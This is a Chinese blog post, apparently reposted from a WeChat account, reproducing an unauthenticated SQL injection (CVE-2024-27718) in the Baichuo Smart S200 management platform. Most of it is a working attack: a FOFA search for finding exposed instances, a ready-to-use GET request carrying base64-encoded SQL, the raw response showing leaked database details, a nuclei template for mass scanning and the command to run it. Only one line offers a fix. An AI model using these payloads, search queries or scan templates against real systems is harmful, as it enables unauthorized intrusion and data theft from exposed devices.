CVE-2024-27718漏洞复现(附POC)

admin 2024年3月25日21:42:22评论81 views字数 2558阅读8分31秒阅读模式

使

01

漏洞名称

北京百绰智能s200管理平台/importexport.php sql注入漏洞

02

漏洞影响

北京百绰智能s200管理平台

CVE-2024-27718漏洞复现(附POC)

03

漏洞描述

北京百绰智能s200管理平台的/importexport.php 接口处存在SQL注入漏洞。未经授权的攻击者可以利用该漏洞获取敏感信息。

04

FOFA搜索语句
title="Smart管理平台"

CVE-2024-27718漏洞复现(附POC)

05

漏洞复现

这是个get请求,可以直接用浏览器访问,建议使用火狐浏览器访问,chrome的安全级别高可能打不开加密链接。

https://x.x.x.x/importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql

完整数据包如下:
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()

GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1Host: x.x.x.xCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailersConnection: close

响应内容如下

HTTP/1.1 200 OKDate: Fri, 22 Mar 2024 17:02:29 GMTServer: Apache/2.2.4 (Unix) PHP/4.4.6 mod_ssl/2.2.4 OpenSSL/0.9.8kX-Powered-By: PHP/4.4.6Expires: 0Cache-Control: publicPragma: publicAccept-Ranges: bytesContent-Disposition: attachment; filename=.csvContent-Length: 17Connection: closeContent-Type: application/octet-stream,,,1,nsg,5.0.37

CVE-2024-27718漏洞复现(附POC)

漏洞复现成功

06

批量漏洞扫描 poc

nuclei poc文件内容如下,核心是计算102103122的DM5值,然后判断返回值中是否包含计算结果

id: CVE-2024-27718info:  name: 北京百绰智能s200管理平台/importexport.php sql注入漏洞  author: fgz  severity: high  description: '北京百绰智能s200管理平台的/importexport.php 接口处存在SQL注入漏洞。未经授权的攻击者可以利用该漏洞获取敏感信息。'  tags: CVE-2024,sqli  metadata:    max-request: 1    fofa-query: title="Smart管理平台"    verified: truerequests:  - raw:      - |        GET /importexport.php?sql=c2VsZWN0IDEsbWQ1KDEwMjEwMzEyMik=&type=exportexcelbysql HTTP/1.1        Host: {{Hostname}}        Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate, br        Upgrade-Insecure-Requests: 1        Sec-Fetch-Dest: document        Sec-Fetch-Mode: navigate        Sec-Fetch-Site: none        Sec-Fetch-User: ?1        Te: trailers        Connection: close    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body,'6cfe798ba8e5b85feb50164c59f4bec9')"

运行POC

nuclei.exe -u https://x.x.x.x -t mypoc/cve/CVE-2024-27718.yaml

CVE-2024-27718漏洞复现(附POC)

07

修复建议

建议您更新当前系统或软件至最新版,完成漏洞的修复。

08

新粉丝

原文始发于微信公众号(AI与网安):CVE-2024-27718漏洞复现(附POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月25日21:42:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-27718漏洞复现(附POC)https://cn-sec.com/archives/2601218.html

发表评论

匿名网友 填写信息